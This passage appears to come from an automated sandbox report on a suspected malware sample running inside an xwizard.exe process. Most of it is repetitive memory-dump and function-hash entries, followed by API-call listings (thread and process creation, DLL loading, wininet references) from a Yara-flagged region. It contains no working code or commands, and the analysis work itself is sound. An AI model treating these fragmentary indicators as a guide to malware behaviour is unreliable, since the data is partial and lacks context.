                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                      • Instruction ID: 09b50227317fcc0b00ceb69003c66df74e199cd130a21333526ad171af365a19
                                                                                      • Opcode Fuzzy Hash: 2d9fda8659638fa86f5f3e159ec6362f44468c6b42a6872deaca7cc01de83a27
                                                                                      • Instruction Fuzzy Hash: 889002616015004261507159480441660059BE5305396C225A0555670C8618D955A26A
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                      • Instruction ID: 3a088205638b0d737d516f981772ec1ee5442226376222bcfb3841d772319372
                                                                                      • Opcode Fuzzy Hash: da42be68d034ea420faefee97cd5dd9855ec77711ab55841d5ccdd0a3d8d6661
                                                                                      • Instruction Fuzzy Hash: BD90023160580012B1507159488455640059BE4305B56C121E0425674C8A14DA566362
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                      • Instruction ID: e954dc9a62869d5acce5c8a5faf8ca377f8c6780586c1450130cb14759bf2726
                                                                                      • Opcode Fuzzy Hash: f0c868c9885f421ba80371cd8e1dd79cf84d55e83d42718f4373077bce5c3261
                                                                                      • Instruction Fuzzy Hash: 8F90023120148802F1207159840475A00058BD4305F5AC521A4425778D8695D9917122
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                      • Instruction ID: 2ebf845620946ae95afda4dce2bef4df7a94836508425cd97327b55d42969960
                                                                                      • Opcode Fuzzy Hash: 8b16177a39297ae100fa9b9b279cf01eec899386c367d981b57944a2c1df9e1d
                                                                                      • Instruction Fuzzy Hash: 9A90023120140842F11071594404B5600058BE4305F56C126A0125774D8615D9517522
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                      • Instruction ID: c99258c2b026cc0c6a7741ab432a7e37724669227056482998b67190fc2d6e4c
                                                                                      • Opcode Fuzzy Hash: a14cc5b32d1a043e0adc9ddf32ffda316cfd6bde1558dce7ba88fd17103c12a8
                                                                                      • Instruction Fuzzy Hash: FA90023120140402F1107599540865600058BE4305F56D121A5025675EC665D9917132
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                      • Instruction ID: c286157c7f259d502d8100b6c2497a4f589f700f61c028ffcff190424eccb69d
                                                                                      • Opcode Fuzzy Hash: a52687d8a4663bbd0ec581a9ee1f9fc2d1f0231e8f0d1ede4575063f964de409
                                                                                      • Instruction Fuzzy Hash: 7390022130140003F150715954186164005DBE5305F56D121E0415674CD915D9566223
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                      • Instruction ID: f6a588346f9271fb85ac93d01977c8c40445da2f371cdcd472252316c4e51bd4
                                                                                      • Opcode Fuzzy Hash: 2ca06d3aba3866d15848b227d54923381706efcde62c52458d64cd7d4c335bca
                                                                                      • Instruction Fuzzy Hash: 9390022921340002F1907159540861A00058BD5206F96D525A0016678CC915D9696322
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                      • Instruction ID: cf788a138988e4b519366ce642e34164e6be60bbb069a560b1830b2ac4a2e370
                                                                                      • Opcode Fuzzy Hash: 3f18a5fc876d805ac95180a9ac39be8919cde8a749ca0ec74c916ebcbabcf353
                                                                                      • Instruction Fuzzy Hash: 2890023120140413F1217159450471700098BD4245F96C522A0425678D9656DA52B122
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                      • Instruction ID: c4f9a9e9bc8cda713ea5bef28835e30bff6817fa7b444b5dc11189daab241e7a
                                                                                      • Opcode Fuzzy Hash: 4e60d6652c07eee727dcf9ffc7350c0061a6a1f2429eb0bf31585ee5bfa0fcf8
                                                                                      • Instruction Fuzzy Hash: 55900221242441527555B159440451740069BE4245796C122A1415A70C8526E956E622
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                      • Instruction ID: 432fa674191338cc366870597c62bda3df091ec8a6c2706863de63039936c829
                                                                                      • Opcode Fuzzy Hash: 423ffc7b76d03914084726d6ddfe4ed68fe35a5debaf878e9ddab3847e834aa0
                                                                                      • Instruction Fuzzy Hash: 3690026120180403F1507559480461700058BD4306F56C121A2065675E8A29DD517136
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                      • Instruction ID: bbfce90d39726ab3e231d49c1058be8873f2955c135eb3379b7b6ba3e1cf0789
                                                                                      • Opcode Fuzzy Hash: f94915525b3cd111942b0b3c2bd9b957a0a0e4d578684f603a3218117588ffec
                                                                                      • Instruction Fuzzy Hash: 9F90022160140502F11171594404626000A8BD4245F96C132A1025675ECA25DA92B132
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                      • Instruction ID: 8a0c87c75761a7ae36abc10059158c9c49aa6bde81d60bc92a643ae53a2491ae
                                                                                      • Opcode Fuzzy Hash: 54cc8d3cc27ed6ee498f59959bc4c6d748f36ebc8e3da0eb92e9e711eb1693cc
                                                                                      • Instruction Fuzzy Hash: 5E90026134140442F11071594414B160005CBE5305F56C125E1065674D8619DD527127
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                      • Instruction ID: e24d4509c6d78deee3a843ca1bdcb78497efed686a9557c552386409164fef25
                                                                                      • Opcode Fuzzy Hash: 09dfa46f8f1a8aed04173be7b9e5d1d434fcc6899977071b0a0aab8fddd425b8
                                                                                      • Instruction Fuzzy Hash: 34900221211C0042F21075694C14B1700058BD4307F56C225A0155674CC915D9616522
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                      • Instruction ID: 923eabafbb8ea3c1d38c466959bfdf1fa47541231404c60837d08dddfa7eb121
                                                                                      • Opcode Fuzzy Hash: 05ce7322b587c83fbc8b610e7648b8cec6317f4e8841b0477078f0e6be9841d6
                                                                                      • Instruction Fuzzy Hash: E0900221601400426150716988449164005AFE5215756C231A0999670D8559D9656666
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3108227033.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                      • Associated: 00000006.00000002.3108227033.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000006.00000002.3108227033.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_4760000_xwizard.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 773 28c3cc0-28c3d08 call 28cb590 776 28c3d0e-28c3d84 call 28cb660 call 28b47f0 call 28a1410 call 28c1e20 773->776 777 28c3e14-28c3e1a 773->777 786 28c3d90-28c3da4 Sleep 776->786 787 28c3e05-28c3e0c 786->787 788 28c3da6-28c3db8 786->788 787->786 791 28c3e0e 787->791 789 28c3dda-28c3df3 call 28c6220 788->789 790 28c3dba-28c3dd8 call 28c6180 788->790 795 28c3df8-28c3dfb 789->795 790->795 791->777 795->787
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 028C3D9B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 3442037557-2016760708
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 3442037557-2016760708
                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028B4862
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,028B856E,00000010,?,?,?,00000044,?,00000010,028B856E,?,?,?), ref: 028C9A23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028A9E75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028A9E75
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(028B1D39,?,028C5BAF,028B1D39,028C58BF,028C5BAF,?,028B1D39,028C58BF,00001000,?,?,00000000), ref: 028C991F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00012891,00000007,00000000,00000004,00000000,028B40CF,000000F4), ref: 028C996F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 028B85DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,028B2020,028C81FF,028C58BF,028B1FF0), ref: 028B83D3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028A0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_28a0000_xwizard.jbxd
                                                                                      Yara matches
                                                                                      Similarity
